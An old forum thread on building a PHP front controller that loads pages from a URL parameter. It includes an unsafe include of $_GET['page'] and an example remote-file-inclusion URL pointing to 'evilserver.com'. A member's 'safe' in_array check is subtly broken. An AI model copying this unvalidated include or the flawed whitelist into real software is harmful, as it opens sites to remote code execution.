Keep Server Online
If you find the Apache Lounge, the downloads and overall help useful, please express your satisfaction with a donation.
or
A donation makes a contribution towards the costs, the time and effort that's going in this site and building.
Thank You! Steffen
Your donations will help to keep this site alive and well, and continuing building binaries. Apache Lounge is not sponsored.
| |
|
Topic: Page IDs |
Page 1, 2 Next |
Author |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Sun 12 Nov '06 21:46 Post subject: Page IDs |
|
|
How would I do this in PHP?
Have one page that would contain other pages. Like this. Address in bar:
www.something.com/index.php?page=home
and have another page like this:
www.something.com/index.php?page=stuff
So basically I need to have one page that does a lot. I would want it to have a server-side-include that would change. Can somebody help me with that? |
|
Back to top |
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Sun 12 Nov '06 22:31 Post subject: |
|
|
You can do that like
Code: |
<?php
$page=$_GET['page'];
include $page;
?>
|
But you must be very carefull with that! Some bad ppl could mess with that like
www.something.com/index.php?page=http://evilserver.com/badinput.php
So you have to check what is coming in. Or much better, create a white list!
Code: |
$allowed_sites = array( "help", "main", "contact" );
if ( in_array( $_GET['page'] ) )
{
include( './includes/' . $_GET['page'] . '.php' );
}
else
{
die "Hacking attempt";
}
|
This scripts also inlcude from the subfolder includes. So no one can hack it. |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Mon 13 Nov '06 0:39 Post subject: |
|
|
Thanks , That works great. But the safety code does not. I put that in and nothing comes up.
I tried something like www.something.com/index.php?page=http://evilserver.com/badinput.php, and nothing happened. It didn't work anyway.
I was wondering if index.php could read another page with all the links? Because then I would not need to give ?name=something.php. I could just give something. |
|
Back to top |
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Mon 13 Nov '06 12:15 Post subject: |
|
|
Whoops! I was in a hurry, sorry! Made some syntax errors
Code: |
<?php
$allowed_sites = array( "help", "main", "contact" );
if(in_array( $_GET['page'],$allowed_sites)){
include( './includes/' . $_GET['page'] . '.php' );
}
else
{
die("Hacking attempt");
}
?>
|
But there is still missing an error handling when $_GET['page'] is empty! |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
|
Back to top |
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Mon 13 Nov '06 15:16 Post subject: |
|
|
Why do you include the file 2 times?
include $page and include( './includes/' . $_GET['page'] . '.php' );
that make no sense.
the include( './includes/' . $_GET['page'] . '.php' ); always in include a php file! You don't have to put the .php in the url! If you dou, the include tries to
include e.g. inlcude/hi.php.php
in the array $allowed_sites you don' t have to set .php, only put "hi" into it.
For debugging, you should show all errors.
error_reporting(E_ALL); |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Mon 13 Nov '06 15:31 Post subject: |
|
|
That was stupid of me. It works fine now. Thank you! |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Mon 13 Nov '06 20:34 Post subject: |
|
|
I have folders (besides includes) and sub-folders and I need to have those page too. How would I do that.
EDIT: actually can you make a script with a category and page.
It would control a folder and a file. |
|
Back to top |
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Mon 13 Nov '06 22:53 Post subject: |
|
|
Code: | <?php
$pages = array(
'index' => array(
'dir' => '/dir1/dir2/',
'file' => 'page.php',
),
'index2' => array(
'dir' => '/dir1/dir3/',
'file' => 'page.php',
),
'index3' => array(
'dir' => '/dir1/dir2/',
'file' => 'page2.php',
),
'index4' => array(
'dir' => '/dir1/dir4/',
'file' => 'page.php',
),
);
// assuming GET here, and set to 'index' if not provided
// this is basic error correction
$page = ( $_GET['page'] ) ? strtolower( $_GET['page'] ) : 'index';
// if it's not in the array, let's go to the default which
// is 'index'
if( !in_array( $page, $pages ) )
$page = 'index';
// now include the correct page from the appropriate dir
include( $pages[$page]['dir'] . $pages[$page]['file'] );
?> |
As an example if you had:
http://www.someurl.com?page=index2
It would load the values from 'index2' which would be a path of:
/dir1/dir3/page.php
Does this make sense?
It gets complicated, but if you use arrays that are populated from a db, such as if you were using a Content Management System of some sort, then this could actually be highly flexible, making it so easy to change where pages load from, and all the while the client never knows because the URL does not change.
What's more, you can change pages based on such things as the HTTP_REFERER, the IP, the time of day, or what ever criteria you want. I use complex arrays for sites that have to change a lot, or have to change based on certain "conditions". |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
|
Back to top |
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 0:03 Post subject: |
|
|
It is the same principle, but instead you pass two vars and maybe you use multple one dimensional arrays, I dunno.
At some risk here, I suggest that you should really buy a book on PHP if you are working with the extreme basic stuff. Seriously, that is what I did, but you can also get a ton of info using the online manuals at php.net as well.
The example I offered could be modified in twenty different ways, or more. It's just an example, but if you would prefer to pass a bunch of variables, you have to consider error detection, correction, and by extension, security.
What happens when they pass a bunch of bogus variables across, how does your web site's backend respond?
You can write your URL's on so many ways such as:
Code: | ?c=folder&page=file
?c=folder,file
?c=folder,file,0e25b6dd4ca582a5e63d8f706af011d0 // checksum
// or you could use a session to deliver the checksum,
// using client side javascript
// sky is the limit
?c[0]=folder&c[1]=file // results in an array |
So you decide based on your needs. But your needs should be guided by security, in my estimation. Security is only as sound as your knowledge base is at the time you write your code. Start with the basics, get a book - that is my sincere and humble advice. |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Tue 14 Nov '06 15:12 Post subject: |
|
|
Well, I don't have a book now. And I need this script. I edited James' script. But I did not work. This is the script, but can you please help me?
Code: | $c=$_GET['c'];
$page=$_GET['page'];
$allowed_sites = array( "hi", "main", "contact" );
if(in_array( $_GET['c'],$_GET['page'],$allowed_sites))
{
include( . /$_GET['c']/ . $_GET['page'] . '.php' );
}
else
{
die("Hacking attempt");
} |
Nothing comes up when I open http://data-base-web.com/tester/index.php?c=includes&page=hi . |
|
Back to top |
|
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7360 Location: Germany, Next to Hamburg
|
Posted: Tue 14 Nov '06 15:56 Post subject: |
|
|
Turn your error handling on! Or you won't see the errors!
in your php.ini
Code: |
error_reporting = E_ALL & ~E_NOTICE
display_errors = On
|
|
|
Back to top |
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 16:00 Post subject: |
|
|
Yes, and along with turning on error reporting, as you should for development anyway, you should also ensure you are writing to a PHP.LOG file, or PHP_ERROR.LOG, what ever you call it. You should see errors reported to some log file that you designate in your PHP.INI file. Always look at the logs for helpful troubleshooting info. |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
|
Back to top |
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 19:44 Post subject: |
|
|
Paste the portion of your PHP.INI file that covers Error Reporting would you. It appears you do not have error reporting set properly by my estimation. Further, what do you have for error log set up in your PHP.INI?
You really need both the error log and the error reporting. |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Tue 14 Nov '06 19:50 Post subject: |
|
|
Code: | ; - register_long_arrays = Off [Performance]
; Disables registration of the older (and deprecated) long predefined array
; variables ($HTTP_*_VARS). Instead, use the superglobals that were
; introduced in PHP 4.1.0
- display_errors = On [Security]
; With this directive set to off, errors that occur during the execution of
; scripts will no longer be displayed as a part of the script output, and thus,
; will no longer be exposed to remote users. With some errors, the error message
; content may expose information about your script, web server, or database
; server that may be exploitable for hacking. Production sites should have this
; directive set to off.
; - log_errors = On [Security]
; This directive complements the above one. Any errors that occur during the
; execution of your script will be logged (typically, to your server's error log,
; but can be configured in several ways). Along with setting display_errors to off,
; this setup gives you the ability to fully understand what may have gone wrong,
; without exposing any sensitive information to remote users.
; - output_buffering = 4096 [Performance]
; Set a 4KB output buffer. Enabling output buffering typically results in less
; writes, and sometimes less packets sent on the wire, which can often lead to
; better performance. The gain this directive actually yields greatly depends
; on which Web server you're working with, and what kind of scripts you're using.
; - register_argc_argv = Off [Performance]
; Disables registration of the somewhat redundant $argv and $argc global
; variables.
; - magic_quotes_gpc = Off [Performance]
; Input data is no longer escaped with slashes so that it can be sent into
; SQL databases without further manipulation. Instead, you should use the
; function addslashes() on each input element you wish to send to a database.
; - variables_order = "GPCS" [Performance]
; The environment variables are not hashed into the $_ENV. To access
; environment variables, you can use getenv() instead.
; - error_reporting = E_ALL [Code Cleanliness, Security(?)]
; By default, PHP suppresses errors of type E_NOTICE. These error messages
; are emitted for non-critical errors, but that could be a symptom of a bigger
; problem. Most notably, this will cause error messages about the use
; of uninitialized variables to be displayed.
; - allow_call_time_pass_reference = Off [Code cleanliness]
; It's not possible to decide to force a variable to be passed by reference
; when calling a function. The PHP 4 style to do this is by making the
; function require the relevant argument by reference.
|
I also have error_reporting = E_ALL & ~E_NOTICE |
|
Back to top |
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 20:12 Post subject: |
|
|
Okay, everything you posted above is comment text and none of it has any bearing on the functionality or performance of your server.
On my local testing server, running FCGI, here is my settings for logging and reporting errors:
Code: | error_reporting = E_PARSE | E_ERROR | E_WARNING | E_NOTICE
display_errors = On
display_startup_errors = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
track_errors = Off
error_log = c:/apache2/logs/PHP_FCGI_error.log |
I chose to report most things, even notices, I like my production code to be ultra clean, though it's not really necessary I suppose.
Tell me if you have something like these settings. Notice that I created a log file with error_log = c:/apache2/logs/PHP_FCGI_error.log. I hope this helps you out a bit to get the error reporting and logging enabled and functional.
Even if you you have something not shown to the screen, which in a production environment you would not want in most cases, you should be logging these errors.
Notice: None of the lines of my INI pasted above are commented out, that is, starting with a ; semicolon character. These are the basics of configuring and running a PHP based web server that a book will help you with, to get the basics down first, building a knowledge foundation.
Last edited by Brian on Tue 14 Nov '06 20:13; edited 1 time in total |
|
Back to top |
|
sb.net
Joined: 22 Sep 2006 Posts: 120 Location: USA
|
Posted: Tue 14 Nov '06 20:13 Post subject: |
|
|
look at the 7th line |
|
Back to top |
|
Brian
Joined: 21 Oct 2005 Posts: 209 Location: Puyallup, WA USA
|
Posted: Tue 14 Nov '06 20:24 Post subject: |
|
|
Something else that crosses my mind, why do you not have error detection and correction in place?
For example, if you say page=index but let's say someone gets cute and tries to type page=indexx or something else, what happens?
I suggest you force them back to the default page, perhaps defaulting back to page=index. Error detection can also allow you an opportunity to create through your PHP scripts custom logging, something my sites do when needed. They open and update a log file (flat text file), or make a db entry. This can be useful in some cases. Again, all basic stuff. |
|
Back to top |
|
|
|
|
|
|